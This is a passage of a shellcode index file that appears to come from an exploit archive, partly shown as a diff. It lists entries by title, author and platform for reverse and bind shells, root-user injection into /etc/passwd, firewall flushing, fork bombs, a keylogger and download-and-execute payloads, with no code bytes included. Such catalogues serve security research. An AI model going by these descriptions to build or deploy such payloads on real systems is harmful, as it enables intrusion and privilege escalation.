43639,shellcodes/linux_x86/43639.c,"Linux/x86 - Flush IPChains Rules (/sbin/ipchains -F) Shellcode (58 bytes)",2009-01-01,dev0id,shellcode,linux_x86
43640,shellcodes/bsd_x86/43640.c,"BSD/x86 - symlink /bin/sh sh Shellcode (39 bytes)",2009-01-01,dev0id,shellcode,bsd_x86
43641,shellcodes/linux_x86/43641.c,"Linux/x86 - symlink /bin/sh sh Shellcode (36 bytes)",2009-01-01,dev0id,shellcode,linux_x86
43642,shellcodes/bsd_x86/43642.c,"BSD/x86 - Write to /etc/passwd with uid(0) + gid(0) Shellcode (74 bytes)",2009-01-01,dev0id,shellcode,bsd_x86
43643,shellcodes/linux_x86/43643.c,"Linux/x86 - Write to /etc/passwd with uid(0) + gid(0) Shellcode (74 bytes)",2009-01-01,dev0id,shellcode,linux_x86
43644,shellcodes/bsd_x86/43644.asm,"BSD/x86 - execve(/bin/sh) + seteuid(0) Shellcode (31 bytes)",2009-01-01,dev0id,shellcode,bsd_x86
43645,shellcodes/bsd_x86/43645.asm,"BSD/x86 - execve(/bin/sh) Shellcode (28 bytes)",2009-01-01,dev0id,shellcode,bsd_x86
43646,shellcodes/linux_x86/43646.c,"Linux/x86 - Bind TCP (3879/TCP) Shell (/bin/sh) Shellcode (113 bytes)",2009-01-01,lamagra,shellcode,linux_x86
43647,shellcodes/linux_x86/43647.c,"Linux/x86 - Add Root User (w00w00) To /etc/passwd Shellcode (104 bytes)",2009-01-01,Shok,shellcode,linux_x86
43648,shellcodes/linux_x86/43648.c,"Linux/x86 - Disable Shadowing Shellcode (42 bytes)",2009-07-04,vlan7,shellcode,linux_x86
43649,shellcodes/linux_x86/43649.c,"Linux/x86 - setuid(0) + execve(/bin/sh) Shellcode (27 bytes)",2009-07-04,vlan7,shellcode,linux_x86
43650,shellcodes/linux_x86/43650.c,"Linux/x86 - exit(0) / exit(1) Shellcode (3/4 bytes)",2009-06-18,TheWorm,shellcode,linux_x86
43651,shellcodes/linux_x86/43651.c,"Linux/x86 - setuid(0) + execve(/bin/sh_0) Shellcode (25 bytes)",2009-06-23,TheWorm,shellcode,linux_x86
43652,shellcodes/linux_x86/43652.c,"Linux/x86 - setuid(0) + setgid(0) + execve(/bin/sh_[/bin/sh_NULL])) Shellcode (25 bytes)",2009-06-23,TheWorm,shellcode,linux_x86
43653,shellcodes/linux_x86/43653.c,"Linux/x86 - execve(/sbin/shutdown_/sbin/shutdown 0) Shellcode (36 bytes)",2009-07-11,TheWorm,shellcode,linux_x86
43654,shellcodes/linux_x86/43654.c,"Linux/x86 - execve(/sbin/reboot_/sbin/reboot) Shellcode (28 bytes)",2009-07-11,TheWorm,shellcode,linux_x86
43655,shellcodes/linux_x86/43655.c,"Linux/x86 - execve(/sbin/halt_/sbin/halt) Shellcode (27 bytes)",2009-07-11,TheWorm,shellcode,linux_x86
43656,shellcodes/linux_x86/43656.c,"Linux/x86 - Bind TCP (64713/TCP) Shell (/bin/sh) Shellcode (83 bytes)",2009-01-01,storm,shellcode,linux_x86
43657,shellcodes/linux_x86/43657.c,"Linux/x86 - setuid(0) + execve(_/bin/sh__0_0) Shellcode (28 bytes)",2009-01-01,storm,shellcode,linux_x86
43658,shellcodes/linux_x86/43658.c,"Linux/x86 - execve(/bin/sh_0_0) Shellcode (21 bytes)",2009-01-01,storm,shellcode,linux_x86
43660,shellcodes/linux_x86/43660.c,"Linux/x86 - fork() + setreuid(0_ 0) + execve(cp /bin/sh /tmp/sh; chmod 4755 /tmp/sh) Shellcode (126 bytes)",2009-01-01,anonymous,shellcode,linux_x86
43661,shellcodes/linux_x86/43661.c,"Linux/x86 - Audio (knock knock knock) via /dev/dsp + setreuid(0_0) + execve() Shellcode (566 bytes)",2000-12-20,"Cody Tubbs",shellcode,linux_x86
43662,shellcodes/linux_x86/43662.c,"Linux/x86 - Add Root User (w000t) + No Password Shellcode (177 bytes)",2009-01-01,zillion,shellcode,linux_x86
43663,shellcodes/linux_x86/43663.c,"Linux/x86 - execve(/sbin/ipchains -F) Shellcode (70 bytes)",2009-01-01,zillion,shellcode,linux_x86
43664,shellcodes/linux_x86/43664.c,"Linux/x86 - execve(/sbin/iptables -F) Shellcode (70 bytes)",2009-01-01,zillion,shellcode,linux_x86
40549,shellcodes/windows_x86-64/40549.c,"Windows x64 - cmd.exe WinExec() Shellcode (93 bytes)",2016-10-17,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
40560,shellcodes/windows_x86/40560.asm,"Windows x86 - Reverse UDP Keylogger (www.example.com:4444/UDP) Shellcode (493 bytes)",2016-10-17,Fugu,shellcode,windows_x86
40781,shellcodes/windows_x86-64/40781.c,"Windows x64 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Injection Shellcode (694 bytes)",2016-11-18,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
40808,shellcodes/linux_x86-64/40808.c,"Linux/x86-64 - execve /bin/sh -c reboot Shellcode (89 bytes)",2016-11-22,"Ashiyane Digital Security Team",shellcode,linux_x86-64
40808,shellcodes/linux_x86-64/40808.c,"Linux/x86-64 - execve(/bin/sh) -c reboot Shellcode (89 bytes)",2016-11-22,"Ashiyane Digital Security Team",shellcode,linux_x86-64
40821,shellcodes/windows_x86-64/40821.c,"Windows x64 - Download File (http://192.168.10.129/pl.exe) + Execute (C:/Users/Public/p.exe) Shellcode (358 bytes)",2016-11-23,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
40872,shellcodes/linux_x86/40872.c,"Linux/x86 - Reverse Netcat + mkfifo (-e option disabled) Shell (localhost:9999) Shellcode (180 bytes)",2016-12-05,"Filippo Bersani",shellcode,linux_x86
40924,shellcodes/linux_x86/40924.c,"Linux/x86 - execve /bin/bash -c Arbitrary Command Execution Null-Free Shellcode (72 bytes)",2016-12-16,"Filippo Bersani",shellcode,linux_x86
40924,shellcodes/linux_x86/40924.c,"Linux/x86 - execve(/bin/bash -c) Arbitrary Command Execution Null-Free Shellcode (72 bytes)",2016-12-16,"Filippo Bersani",shellcode,linux_x86
40981,shellcodes/windows_x86-64/40981.c,"Windows x64 - Bind TCP (2493/TCP) Shell + Password (h271508F) Shellcode (825 bytes)",2017-01-01,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
41072,shellcodes/windows_x86-64/41072.c,"Windows x64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes)",2017-01-15,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
41089,shellcodes/linux_x86-64/41089.c,"Linux/x86-64 - mkdir Shellcode (25 bytes)",2017-01-18,"Ajith Kp",shellcode,linux_x86-64
41128,shellcodes/linux_x86-64/41128.c,"Linux/x86-64 - Bind TCP (5600/TCP) Shell Shellcode (87 bytes)",2017-01-19,"Ajith Kp",shellcode,linux_x86-64
41174,shellcodes/linux_x86-64/41174.nasm,"Linux/x86-64 - execve /bin/sh Shellcode (22 bytes)",2017-01-26,"Robert L. Taylor",shellcode,linux_x86-64
41174,shellcodes/linux_x86-64/41174.nasm,"Linux/x86-64 - execve(/bin/sh) Shellcode (22 bytes)",2017-01-26,"Robert L. Taylor",shellcode,linux_x86-64
41183,shellcodes/linux/41183.c,"Linux - execve(_/bin/sh__ NULL_ 0) Multi/Dual Mode Shellcode (37 bytes)",2017-01-29,odzhancode,shellcode,linux
41220,shellcodes/generator/41220.c,"Linux - Reverse TCP Shell + Multi/Dual Mode Shellcode (129 bytes) (Generator)",2017-02-02,odzhancode,shellcode,generator
41282,shellcodes/linux_x86/41282.nasm,"Linux/x86 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Alphanumeric + Staged Shellcode (103 bytes)",2017-02-08,"Snir Levi",shellcode,linux_x86
@ -634,25 +686,25 @@ id,file,description,date,author,type,platform
41468,shellcodes/linux_x86-64/41468.nasm,"Linux/x86-64 - Bind TCP (Random TCP Port) Shell (/bin/sh) Shellcode (54 bytes)",2017-02-26,"Robert L. Taylor",shellcode,linux_x86-64
41477,shellcodes/linux_x86-64/41477.c,"Linux/x86-64 - Reverse TCP (192.168.1.45:4444/TCP) Shell Shellcode (84 bytes)",2017-02-28,"Manuel Mancera",shellcode,linux_x86-64
41481,shellcodes/windows_x86/41481.asm,"Windows x86 - Reverse TCP (127.0.0.1:4444/TCP) Shell + Staged + Alphanumeric Shellcode (332 bytes)",2017-03-01,"Snir Levi",shellcode,windows_x86
41498,shellcodes/linux_x86-64/41498.nasm,"Linux/x86-64 - setuid(0) + execve(/bin/sh) Polymorphic Shellcode (31 bytes)",2017-03-03,"Robert L. Taylor",shellcode,linux_x86-64
41503,shellcodes/linux_x86-64/41503.nasm,"Linux/x86-64 - Flush IPTables Rules (/sbin/iptables -F) Polymorphic Shellcode (47 bytes)",2017-03-03,"Robert L. Taylor",shellcode,linux_x86-64
41498,shellcodes/linux_x86-64/41498.nasm,"Linux/x86-64 - setuid(0) + execve(/bin/sh) + Polymorphic Shellcode (31 bytes)",2017-03-03,"Robert L. Taylor",shellcode,linux_x86-64
41503,shellcodes/linux_x86-64/41503.nasm,"Linux/x86-64 - Flush IPTables Rules (/sbin/iptables -F) + Polymorphic Shellcode (47 bytes)",2017-03-03,"Robert L. Taylor",shellcode,linux_x86-64
41509,shellcodes/linux_x86-64/41509.nasm,"Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1337) Shellcode (72 bytes)",2017-03-04,"Robert L. Taylor",shellcode,linux_x86-64
41510,shellcodes/linux_x86-64/41510.nsam,"Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1234) Polymorphic Shellcode (106 bytes)",2017-03-04,"Robert L. Taylor",shellcode,linux_x86-64
41510,shellcodes/linux_x86-64/41510.nsam,"Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1234) + Polymorphic Shellcode (106 bytes)",2017-03-04,"Robert L. Taylor",shellcode,linux_x86-64
41581,shellcodes/windows_x86/41581.c,"Windows x86 - Hide Console Window Shellcode (182 bytes)",2017-03-11,"Ege Balci",shellcode,windows_x86
43433,shellcodes/linux_x86/43433.c,"Linux/x86 - Reverse TCP (127.1.1.1:8888/TCP) Shell (/bin/sh) + Null-Free Shellcode (67/69 bytes)",2018-01-05,"Nipun Jaswal",shellcode,linux_x86
43476,shellcodes/linux_x86/43476.c,"Linux/x86 - execve /bin/dash Shellcode (30 bytes)",2018-01-10,"Hashim Jawad",shellcode,linux_x86
43476,shellcodes/linux_x86/43476.c,"Linux/x86 - execve(/bin/dash) Shellcode (30 bytes)",2018-01-10,"Hashim Jawad",shellcode,linux_x86
43480,shellcodes/alpha/43480.c,"Alpha - /bin/sh Shellcode (80 bytes)",2009-01-01,"Lamont Granquist",shellcode,alpha
43481,shellcodes/alpha/43481.c,"Alpha - execve() Shellcode (112 bytes)",2009-01-01,anonymous,shellcode,alpha
43482,shellcodes/alpha/43482.c,"Alpha - setuid() Shellcode (156 bytes)",2009-01-01,anonymous,shellcode,alpha
43483,shellcodes/bsd_x86/43483.c,"BSD/x86 - setreuid(geteuid()_ geteuid()) + execve(_/bin/sh_) Shellcode (36 bytes)",2009-01-01,"Jihyeog Lim",shellcode,bsd_x86
43489,shellcodes/linux_x86/43489.c,"Linux/x86 - execve(/bin/sh) Polymorphic Shellcode (53 bytes)",2018-01-10,"Debashis Pal",shellcode,linux_x86
43489,shellcodes/linux_x86/43489.c,"Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (53 bytes)",2018-01-10,"Debashis Pal",shellcode,linux_x86
43497,shellcodes/arm/43497.asm,"Linux/ARM (Raspberry Pi) - Bind TCP (0.0.0.0:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (112 bytes)",2018-01-11,Azeria,shellcode,arm
43502,shellcodes/freebsd_x86-64/43502.txt,"FreeBSD/x86-64 - execve /bin/sh Shellcode (28 bytes)",2009-01-01,Gitsnik,shellcode,freebsd_x86-64
43502,shellcodes/freebsd_x86-64/43502.txt,"FreeBSD/x86-64 - execve(/bin/sh) Shellcode (28 bytes)",2009-01-01,Gitsnik,shellcode,freebsd_x86-64
43503,shellcodes/freebsd_x86-64/43503.txt,"FreeBSD/x86-64 - Bind TCP Shell (/bin/sh) + Password (R2CBw0cr) Shellcode (127 bytes)",2009-01-11,Gitsnik,shellcode,freebsd_x86-64
43504,shellcodes/freebsd_x86/43504.asm,"FreeBSD/x86 - execv(/bin/sh) Shellcode (23 bytes)",2009-01-01,Tosh,shellcode,freebsd_x86
43505,shellcodes/freebsd_x86/43505.c,"FreeBSD/x86 - //sbin/pfctl -F all Shellcode (47 bytes)",2009-01-01,antrhacks,shellcode,freebsd_x86
43505,shellcodes/freebsd_x86/43505.c,"FreeBSD/x86 - /sbin/pfctl -F all Shellcode (47 bytes)",2009-01-01,antrhacks,shellcode,freebsd_x86
43506,shellcodes/freebsd_x86/43506.c,"FreeBSD/x86 - Bind TCP (41254/TCP) Shell (/bin/sh) Shellcode (115 bytes)",2009-01-01,zillion,shellcode,freebsd_x86
43507,shellcodes/freebsd_x86/43507.c,"FreeBSD - reboot() Shellcode (15 Bytes)",2009-01-01,zillion,shellcode,freebsd_x86
43507,shellcodes/freebsd_x86/43507.c,"FreeBSD/x86 - reboot() Shellcode (15 bytes)",2009-01-01,zillion,shellcode,freebsd_x86
43508,shellcodes/irix/43508.c,"IRIX - execve(/bin/sh -c) Shellcode (72 bytes)",2009-01-01,anonymous,shellcode,irix
43509,shellcodes/irix/43509.c,"IRIX - execve(/bin/sh) Shellcode (43 bytes)",2009-01-01,anonymous,shellcode,irix
43510,shellcodes/irix/43510.c,"IRIX - Bind TCP Shell (/bin/sh) Shellcode (364 bytes)",2009-01-01,scut/teso,shellcode,irix
@ -676,34 +728,34 @@ id,file,description,date,author,type,platform
43550,shellcodes/linux_x86-64/43550.c,"Linux/x86-64 - Execute /bin/sh Shellcode (24 bytes)",2018-01-13,0x4ndr3,shellcode,linux_x86-64
43551,shellcodes/linux_x86-64/43551.c,"Linux/x86-64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (110 bytes)",2014-10-29,"Osanda Malith Jayathissa",shellcode,linux_x86-64
43552,shellcodes/linux_x86-64/43552.c,"Linux/x86-64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (96 bytes)",2018-01-13,0x4ndr3,shellcode,linux_x86-64
43553,shellcodes/linux_x86-64/43553.c,"Linux/x86-64 - execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL) Shellcode (43 bytes)",2018-01-13,0x4ndr3,shellcode,linux_x86-64
43553,shellcodes/linux_x86-64/43553.c,"Linux/x86-64 - Flush IPTables Rules (execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL)) Shellcode (43 bytes)",2018-01-13,0x4ndr3,shellcode,linux_x86-64
43554,shellcodes/linux_x86-64/43554.c,"Linux/x86-64 - sys_access() Egghunter Shellcode (49 bytes)",2009-01-01,Doreth.Z10,shellcode,linux_x86-64
43555,shellcodes/linux_x86-64/43555.c,"Linux/x86-64 - shutdown -h now Shellcode (65 bytes)",2014-06-27,"Osanda Malith Jayathissa",shellcode,linux_x86-64
43556,shellcodes/linux_x86-64/43556.asm,"Linux/x86-64 - shutdown -h now Shellcode (64 bytes)",2014-09-14,Keyman,shellcode,linux_x86-64
43557,shellcodes/linux_x86-64/43557.asm,"Linux/x86-64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (105 bytes)",2014-09-14,Keyman,shellcode,linux_x86-64
43558,shellcodes/linux_x86-64/43558.asm,"Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (136 bytes)",2014-09-04,Keyman,shellcode,linux_x86-64
43559,shellcodes/linux_x86-64/43559.asm,"Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (147 bytes)",2014-09-03,Keyman,shellcode,linux_x86-64
43561,shellcodes/linux_x86-64/43561.asm,"Linux/x86-64 - Add Root User (shell-storm/leet) Polymorphic Shellcode (273 bytes)",2014-09-21,Keyman,shellcode,linux_x86-64
43561,shellcodes/linux_x86-64/43561.asm,"Linux/x86-64 - Add Root User (shell-storm/leet) + Polymorphic Shellcode (273 bytes)",2014-09-21,Keyman,shellcode,linux_x86-64
41630,shellcodes/linux_x86/41630.asm,"Linux/x86 - exceve /bin/sh Encoded Shellcode (44 bytes)",2017-03-17,WangYihang,shellcode,linux_x86
41631,shellcodes/linux_x86/41631.c,"Linux/x86 - Bind TCP (Random TCP Port) Shell (/bin/sh) Shellcode (44 bytes)",2017-03-17,"Oleg Boytsev",shellcode,linux_x86
41635,shellcodes/linux_x86/41635.txt,"Linux/x86 - Read /etc/passwd Shellcode (54 bytes)",2017-03-19,WangYihang,shellcode,linux_x86
42295,shellcodes/linux_x86/42295.c,"Linux/x86 - Reverse TCP (127.1.1.1:11111/TCP) Shell + Null-Free Shellcode (67 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
41723,shellcodes/linux_x86/41723.c,"Linux/x86 - Reverse TCP (192.168.3.119:54321/TCP) Shell (/bin/bash) Shellcode (110 bytes)",2017-03-24,JR0ch17,shellcode,linux_x86
41750,shellcodes/linux_x86-64/41750.txt,"Linux/x86-64 - execve /bin/sh Shellcode (21 bytes)",2017-03-28,WangYihang,shellcode,linux_x86-64
41757,shellcodes/linux_x86/41757.txt,"Linux/x86 - execve /bin/sh Shellcode (21 bytes)",2017-03-29,WangYihang,shellcode,linux_x86
41750,shellcodes/linux_x86-64/41750.txt,"Linux/x86-64 - execve(/bin/sh) Shellcode (21 bytes)",2017-03-28,WangYihang,shellcode,linux_x86-64
41757,shellcodes/linux_x86/41757.txt,"Linux/x86 - execve(/bin/sh) Shellcode (21 bytes)",2017-03-29,WangYihang,shellcode,linux_x86
41827,shellcodes/windows_x86-64/41827.txt,"Windows 10 x64 - Egghunter Shellcode (45 bytes)",2017-04-06,"Peter Baris",shellcode,windows_x86-64
41883,shellcodes/linux_x86-64/41883.txt,"Linux/x86-64 - execve /bin/sh Shellcode (31 bytes) (2)",2017-04-13,WangYihang,shellcode,linux_x86-64
41883,shellcodes/linux_x86-64/41883.txt,"Linux/x86-64 - execve(/bin/sh) Shellcode (31 bytes) (2)",2017-04-13,WangYihang,shellcode,linux_x86-64
41909,shellcodes/linux_x86/41909.c,"Linux/x86 - Egghunter Shellcode (18 bytes)",2017-04-22,phackt_ul,shellcode,linux_x86
41969,shellcodes/linux_x86/41969.c,"Linux/x86 - Disable ASLR Security Shellcode (80 bytes)",2017-05-08,abatchy17,shellcode,linux_x86
41970,shellcodes/linux_x86-64/41970.asm,"Linux/x86-64 - Reverse TCP (::1:1472/TCP) Shell + IPv6 + Null-Free Shellcode (113 bytes)",2017-05-08,Srakai,shellcode,linux_x86-64
42016,shellcodes/windows/42016.asm,"Windows x86/x64 - cmd.exe Shellcode (718 bytes)",2017-05-17,"Filippo Bersani",shellcode,windows
42126,shellcodes/linux_x86-64/42126.c,"Linux/x86-64 - execve /bin/sh Shellcode (31 bytes) (1)",2017-06-05,"Touhid M.Shaikh",shellcode,linux_x86-64
42177,shellcodes/linux_x86/42177.c,"Linux/x86 - execve /bin/sh + setuid(0) + setgid(0) XOR Encoded Shellcode (66 bytes)",2017-06-15,nullparasite,shellcode,linux_x86
42179,shellcodes/linux_x86-64/42179.c,"Linux/x86-64 - execve /bin/sh Shellcode (24 bytes)",2017-06-15,m4n3dw0lf,shellcode,linux_x86-64
42126,shellcodes/linux_x86-64/42126.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (31 bytes) (1)",2017-06-05,"Touhid M.Shaikh",shellcode,linux_x86-64
42177,shellcodes/linux_x86/42177.c,"Linux/x86 - execve(/bin/sh) + setuid(0) + setgid(0) XOR Encoded Shellcode (66 bytes)",2017-06-15,nullparasite,shellcode,linux_x86
42179,shellcodes/linux_x86-64/42179.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (24 bytes)",2017-06-15,m4n3dw0lf,shellcode,linux_x86-64
42208,shellcodes/linux_x86/42208.nasm,"Linux/x86 - Reverse UDP (127.0.0.1:53/UDP) Shell (/bin/sh) Shellcode (668 bytes)",2017-06-20,"DONTON Fetenat C",shellcode,linux_x86
42254,shellcodes/linux_x86/42254.c,"Linux/x86 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (75 bytes)",2017-06-26,wetw0rk,shellcode,linux_x86
42339,shellcodes/linux_x86-64/42339.c,"Linux/x86-64 - Reverse TCP (192.168.1.8:4444/TCP) Shell Shellcode (104 bytes)",2017-07-19,m4n3dw0lf,shellcode,linux_x86-64
42428,shellcodes/linux_x86/42428.c,"Linux/x86 - execve /bin/sh Shellcode (24 bytes)",2017-08-06,"Touhid M.Shaikh",shellcode,linux_x86
42428,shellcodes/linux_x86/42428.c,"Linux/x86 - execve(/bin/sh) Shellcode (24 bytes)",2017-08-06,"Touhid M.Shaikh",shellcode,linux_x86
42485,shellcodes/linux_x86-64/42485.c,"Linux/x86-64 - Reverse TCP (192.168.1.2:4444/TCP) Shell Shellcode (153 bytes)",2017-08-17,"Touhid M.Shaikh",shellcode,linux_x86-64
42522,shellcodes/linux_x86-64/42522.c,"Linux/x86-64 - Kill All Processes Shellcode (19 bytes)",2017-08-19,"Touhid M.Shaikh",shellcode,linux_x86-64
42523,shellcodes/linux_x86-64/42523.c,"Linux/x86-64 - Fork Bomb Shellcode (11 bytes)",2017-08-19,"Touhid M.Shaikh",shellcode,linux_x86-64
@ -711,6 +763,6 @@ id,file,description,date,author,type,platform
42646,shellcodes/arm/42646.c,"Linux/ARM (Raspberry Pi) - Bind TCP (4444/TCP) Shell (/bin/sh) Shellcode (192 bytes)",2017-09-10,"Andrea Sindoni",shellcode,arm
42647,shellcodes/arm/42647.c,"Linux/ARM (Raspberry Pi) - Reverse TCP (192.168.0.12:4444/TCP) Shell (/bin/sh) Shellcode (160 bytes)",2017-09-10,"Andrea Sindoni",shellcode,arm
42791,shellcodes/linux_x86-64/42791.c,"Linux/x86-64 - mkdir() 'evil' Shellcode (30 bytes)",2017-09-25,"Touhid M.Shaikh",shellcode,linux_x86-64
42977,shellcodes/linux_x86/42977.c,"Linux/x86 - execve(/bin/sh) Polymorphic Shellcode (30 bytes)",2017-10-12,"Manuel Mancera",shellcode,linux_x86
42977,shellcodes/linux_x86/42977.c,"Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (30 bytes)",2017-10-12,"Manuel Mancera",shellcode,linux_x86
42992,shellcodes/windows_x86-64/42992.c,"Windows x64 - API Hooking Shellcode (117 bytes)",2017-10-16,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
43463,shellcodes/linux/43463.nasm,"Linux/x86 - chmod 777 /etc/sudoers Shellcode (36 bytes)",2018-01-04,"Hashim Jawad",shellcode,linux

1 id file description date author type platform
2 14113 shellcodes/arm/14113.txt Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes) 2010-06-29 Jonathan Salwan shellcode arm
3 13241 shellcodes/aix/13241.c AIX - execve /bin/sh Shellcode (88 bytes) AIX - execve(/bin/sh) Shellcode (88 bytes) 2004-09-26 Georgi Guninski shellcode aix
4 13242 shellcodes/bsd/13242.txt BSD - Reverse TCP (127.0.0.1:31337/TCP) Shell (/bin/sh) Shellcode (124 bytes) 2000-11-19 Scrippie shellcode bsd
5 13243 shellcodes/bsd_ppc/13243.c BSD/PPC - execve /bin/sh Shellcode (128 bytes) BSD/PPC - execve(/bin/sh) Shellcode (128 bytes) 2004-09-26 Palante shellcode bsd_ppc
6 13244 shellcodes/bsd_x86/13244.c BSD/x86 - setuid(0) + execve /bin/sh Shellcode (30 bytes) BSD/x86 - setuid(0) + execve(/bin/sh) Shellcode (30 bytes) 2006-07-20 Marco Ivaldi shellcode bsd_x86
7 13245 shellcodes/bsd_x86/13245.c BSD/x86 - setuid(0) + Bind TCP (31337/TCP) Shell Shellcode (94 bytes) 2006-07-20 Marco Ivaldi shellcode bsd_x86
8 13246 shellcodes/bsd_x86/13246.c BSD/x86 - execve /bin/sh Shellcode (27 bytes) BSD/x86 - execve(/bin/sh) Shellcode (27 bytes) 2004-09-26 n0gada shellcode bsd_x86
9 13247 shellcodes/bsd_x86/13247.c BSD/x86 - execve /bin/sh + setuid(0) Shellcode (29 bytes) BSD/x86 - execve(/bin/sh) + setuid(0) Shellcode (29 bytes) 2004-09-26 Matias Sedalo shellcode bsd_x86
10 13248 shellcodes/bsd_x86/13248.c BSD/x86 - Bind TCP (31337/TCP) Shell Shellcode (83 bytes) 2004-09-26 no1 shellcode bsd_x86
11 13249 shellcodes/bsd_x86/13249.c BSD/x86 - Bind TCP (Random TCP Port) Shell Shellcode (143 bytes) 2004-09-26 MayheM shellcode bsd_x86
12 13250 shellcodes/bsd_x86/13250.c BSD/x86 - Break chroot Shellcode (45 bytes) 2004-09-26 Matias Sedalo shellcode bsd_x86
13 13251 shellcodes/bsd_x86/13251.c BSD/x86 - execve /bin/sh Encoded Shellcode (49 bytes) BSD/x86 - execve(/bin/sh) Encoded Shellcode (49 bytes) 2004-09-26 dev0id shellcode bsd_x86
14 13252 shellcodes/bsd_x86/13252.c BSD/x86 - execve /bin/sh Encoded Shellcode (57 bytes) BSD/x86 - execve(/bin/sh) + Encoded Shellcode (57 bytes) 2004-09-26 Matias Sedalo shellcode bsd_x86
15 13254 shellcodes/bsd_x86/13254.c BSD/x86 - Reverse TCP (torootteam.host.sk:2222/TCP) Shell Shellcode (93 bytes) 2004-09-26 dev0id shellcode bsd_x86
16 13255 shellcodes/bsd_x86/13255.c BSD/x86 - execve(/bin/cat /etc/master.passwd) | mail root@localhost Shellcode (92 bytes) 2004-09-26 Matias Sedalo shellcode bsd_x86
17 13256 shellcodes/bsd/13256.c BSD/x86 - Reverse TCP (192.168.2.33:6969/TCP) Shell Shellcode (129 bytes) 2004-09-26 Sinan Eren shellcode bsd
18 13257 shellcodes/bsdi_x86/13257.txt BSDi/x86 - execve /bin/sh Shellcode (45 bytes) BSDi/x86 - execve(/bin/sh) Shellcode (45 bytes) 2004-09-26 duke shellcode bsdi_x86
19 13258 shellcodes/bsdi_x86/13258.txt BSDi/x86 - execve /bin/sh Shellcode (46 bytes) BSDi/x86 - execve(/bin/sh) Shellcode (46 bytes) 2004-09-26 vade79 shellcode bsdi_x86
20 13260 shellcodes/bsdi_x86/13260.c BSDi/x86 - execve /bin/sh ToUpper Encoded Shellcode (97 bytes) BSDi/x86 - execve(/bin/sh) ToUpper Encoded Shellcode (97 bytes) 2004-09-26 anonymous shellcode bsdi_x86
21 13261 shellcodes/freebsd/13261.txt FreeBSD x86 / x64 - execve /bin/sh Anti-Debugging Shellcode (140 bytes) FreeBSD x86 / x64 - execve(/bin/sh) Anti-Debugging Shellcode (140 bytes) 2009-04-13 c0d3_z3r0 shellcode freebsd
22 13262 shellcodes/freebsd_x86/13262.txt FreeBSD/x86 - setreuid + execve(pfctl -d) Shellcode (56 bytes) 2008-09-12 suN8Hclf shellcode freebsd_x86
23 13263 shellcodes/freebsd_x86/13263.txt FreeBSD/x86 - Reverse TCP (192.168.1.33:8000/TCP) cat /etc/passwd Shellcode (112 bytes) 2008-09-10 suN8Hclf shellcode freebsd_x86
24 13264 shellcodes/freebsd_x86/13264.txt FreeBSD/x86 - Kill All Processes Shellcode (12 bytes) 2008-09-09 suN8Hclf shellcode freebsd_x86
25 13265 shellcodes/freebsd_x86/13265.c FreeBSD/x86 - Reverse Connection (172.17.0.9:8000/TCP) + Receive Shellcode + Payload Loader + Return Results Null-Free Shellcode (90 bytes) 2008-09-05 sm4x shellcode freebsd_x86
26 13266 shellcodes/freebsd_x86/13266.asm FreeBSD/x86 - execve /bin/cat /etc/master.passwd Null-Free Shellcode (65 bytes) FreeBSD/x86 - execve(/bin/cat /etc/master.passwd) Null-Free Shellcode (65 bytes) 2008-08-25 sm4x shellcode freebsd_x86
27 13267 shellcodes/freebsd_x86/13267.asm FreeBSD/x86 - Reverse TCP (127.0.0.1:8000/TCP) Shell (/bin/sh) + Null-Free Shellcode (89 bytes) 2008-08-21 sm4x shellcode freebsd_x86
28 13268 shellcodes/freebsd_x86/13268.asm FreeBSD/x86 - setuid(0) + execve(ipf -Fa) Shellcode (57 bytes) 2008-08-21 sm4x shellcode freebsd_x86
29 13269 shellcodes/freebsd_x86/13269.c FreeBSD/x86 - execve /bin/sh Encoded Shellcode (48 bytes) FreeBSD/x86 - execve(/bin/sh) Encoded Shellcode (48 bytes) 2008-08-19 c0d3_z3r0 shellcode freebsd_x86
30 13270 shellcodes/freebsd_x86/13270.c FreeBSD/x86 - Bind TCP (4883/TCP) Shell (/bin/sh) + Password Shellcode (222 bytes) 2006-07-19 MahDelin shellcode freebsd_x86
31 13271 shellcodes/freebsd_x86/13271.c FreeBSD/x86 - reboot(RB_AUTOBOOT) Shellcode (7 bytes) 2006-04-19 IZ shellcode freebsd_x86
32 13272 shellcodes/freebsd_x86/13272.c FreeBSD/x86 - execve /bin/sh Shellcode (23 bytes) (1) FreeBSD/x86 - execve(/bin/sh) Shellcode (23 bytes) (1) 2006-04-14 IZ shellcode freebsd_x86
33 13273 shellcodes/freebsd_x86/13273.c FreeBSD/x86 - execve /bin/sh Shellcode (23 bytes) (2) FreeBSD/x86 - execve(/bin/sh) Shellcode (23 bytes) (2) 2004-09-26 marcetam shellcode freebsd_x86
34 13274 shellcodes/freebsd_x86/13274.c FreeBSD/x86 - execve /bin/sh Shellcode (37 bytes) FreeBSD/x86 - execve(/bin/sh) Shellcode (37 bytes) 2004-09-26 preedator shellcode freebsd_x86
